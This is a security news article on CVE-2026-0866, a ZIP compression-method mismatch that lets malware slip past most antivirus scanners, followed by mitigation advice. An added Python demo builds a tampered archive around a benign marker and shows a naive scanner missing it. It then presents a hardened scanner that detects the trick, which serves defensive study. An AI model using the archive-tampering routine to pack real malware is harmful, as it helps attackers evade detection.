New ZIP Vulnerability Bypasses 95% of Antivirus Software

Researchers have identified a critical vulnerability (CVE-2026-0866) that lets attackers hide malware inside ZIP files in a way that the large majority of security scanners tested do not detect.

How the Exploit Works

The technique manipulates the compression-method field in the ZIP header. The archive entry is declared "stored" (uncompressed) even though the data inside is actually compressed. A scanner that trusts the declared method does not decompress the entry; it reads the compressed stream as a run of random-looking bytes, never sees the executable, and so cannot match it against known malware signatures. The payload is nonetheless delivered intact. Note that ZIP records the compression method in two places, each entry's local file header and its central directory record, and parsers differ in which one they trust; the reports do not say which field is altered.
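The following is an added example, not code from the article or from the researchers who reported CVE-2026-0866. It builds a one-entry ZIP whose local file header claims the entry is stored (method 0) while the data is really deflate-compressed and the central directory still says deflate (method 8), then runs three parsers over it: a streaming scanner that trusts the local header, an extractor that goes by the central directory (the stdlib `zipfile` module behaves the same way), and a hardened scanner that cross-checks both headers and inflates "stored" data anyway. Which field the real technique alters is not stated in the article, so patching only the local header is an assumption; the filename, the `MARKER` string standing in for a signature and the `PAYLOAD` bytes are constructed for the demo.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"   # local file header signature
CDIR_SIG = b"PK\x01\x02"    # central directory entry signature
EOCD_SIG = b"PK\x05\x06"    # end-of-central-directory signature
STORED, DEFLATED = 0, 8

# Constructed, benign stand-in for a malicious executable; the "signature"
# the scanners look for is just this marker string (assumption for the demo).
MARKER = b"CONSTRUCTED-MALWARE-MARKER"
PAYLOAD = b"MZ" + b"\x00" * 64 + MARKER + b"\x00" * 64 + MARKER


def build_archive(payload: bytes, lie_about_method: bool) -> bytes:
    """One-entry deflated ZIP. With lie_about_method, the local file header's
    method field is rewritten to STORED; the central directory keeps DEFLATED."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.exe", payload)
    data = bytearray(buf.getvalue())
    if lie_about_method:
        # local header layout: sig(4) version(2) flags(2) method(2) ...
        struct.pack_into("<H", data, data.index(LOCAL_SIG) + 8, STORED)
    return bytes(data)


def local_entries(data: bytes):
    """Walk local file headers in order (a streaming scanner's view). Assumes no
    data descriptors (flag bit 3); zipfile does not set it on a seekable buffer."""
    pos = 0
    while data.startswith(LOCAL_SIG, pos):
        _, _, _, method, _, _, _, csize, _, nlen, xlen = struct.unpack_from(
            "<4sHHHHHIIIHH", data, pos)
        name = data[pos + 30:pos + 30 + nlen].decode()
        start = pos + 30 + nlen + xlen
        yield name, method, data[start:start + csize]
        pos = start + csize


def central_entries(data: bytes):
    """Walk the central directory, which unzip-style extractors trust."""
    eocd = data.rindex(EOCD_SIG)
    pos = struct.unpack_from("<I", data, eocd + 16)[0]  # central directory offset
    while data.startswith(CDIR_SIG, pos):
        hdr = struct.unpack_from("<4sHHHHHHIIIHHHHHII", data, pos)
        method, csize, nlen, xlen, clen, loff = hdr[4], hdr[8], hdr[10], hdr[11], hdr[12], hdr[16]
        name = data[pos + 46:pos + 46 + nlen].decode()
        lnlen, lxlen = struct.unpack_from("<HH", data, loff + 26)  # lengths from local header
        start = loff + 30 + lnlen + lxlen
        yield name, method, data[start:start + csize]
        pos += 46 + nlen + xlen + clen


def decode(method: int, raw: bytes) -> bytes:
    if method == STORED:
        return raw
    if method == DEFLATED:
        return zlib.decompress(raw, -15)  # raw deflate stream, no zlib wrapper
    raise ValueError(f"unsupported method {method}")


def naive_scan(data: bytes, signature: bytes = MARKER) -> list:
    """Trusts each local header: a STORED entry is searched as-is, so a deflate
    stream declared STORED is just noise and the signature never matches."""
    return [name for name, method, raw in local_entries(data)
            if signature in decode(method, raw)]


def extract_like_unzip(data: bytes) -> dict:
    """What the recipient gets: entries decoded per the central directory."""
    return {name: decode(method, raw) for name, method, raw in central_entries(data)}


def stdlib_extract(data: bytes, name: str = "invoice.exe") -> bytes:
    """Python's zipfile also decodes with the central directory's method."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def hardened_scan(data: bytes, signature: bytes = MARKER):
    """Cross-check both headers and try inflating even 'stored' data.
    Returns (flagged entry names, list of header inconsistencies)."""
    local = {name: method for name, method, _ in local_entries(data)}
    flagged, anomalies = [], []
    for name, cmethod, raw in central_entries(data):
        lmethod = local.get(name)
        if lmethod != cmethod:
            anomalies.append(f"{name}: local header method {lmethod}, central directory {cmethod}")
        candidates = [raw]
        for method in (lmethod, cmethod, DEFLATED):
            try:
                candidates.append(decode(method, raw))
            except (zlib.error, ValueError):
                pass
        if any(signature in blob for blob in candidates):
            flagged.append(name)
    return flagged, anomalies


if __name__ == "__main__":
    honest = build_archive(PAYLOAD, lie_about_method=False)
    tampered = build_archive(PAYLOAD, lie_about_method=True)
    print("naive scan, honest archive:  ", naive_scan(honest))
    print("naive scan, tampered archive:", naive_scan(tampered))
    print("recipient still gets marker: ", MARKER in stdlib_extract(tampered))
    print("hardened scan, tampered:     ", hardened_scan(tampered))
```

The hardened scanner's two checks are independent: the header cross-check catches this particular construction even without a signature hit, and inflating regardless of the declared method catches a variant where both headers lie consistently but the bytes are still a valid deflate stream.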

Current Risk

According to reports from Tom's Hardware, approximately 95% of antivirus tools currently fail to detect this evasion technique. A payload packed this way can therefore pass both perimeter scanning, for example at the mail gateway, and endpoint protection undetected.

Recommendations

Until security vendors update their detection engines to account for this header manipulation:

  • Exercise extreme caution when handling ZIP files from external or unknown sources.
  • Update security software immediately as patches become available.
  • Restrict ZIP attachments in corporate email environments where possible.
  • If you operate your own scanning pipeline, decompress archive entries before matching rather than trusting the declared compression method, and treat an entry whose local file header disagrees with its central directory record, or whose "stored" data turns out to be a valid compressed stream, as suspicious.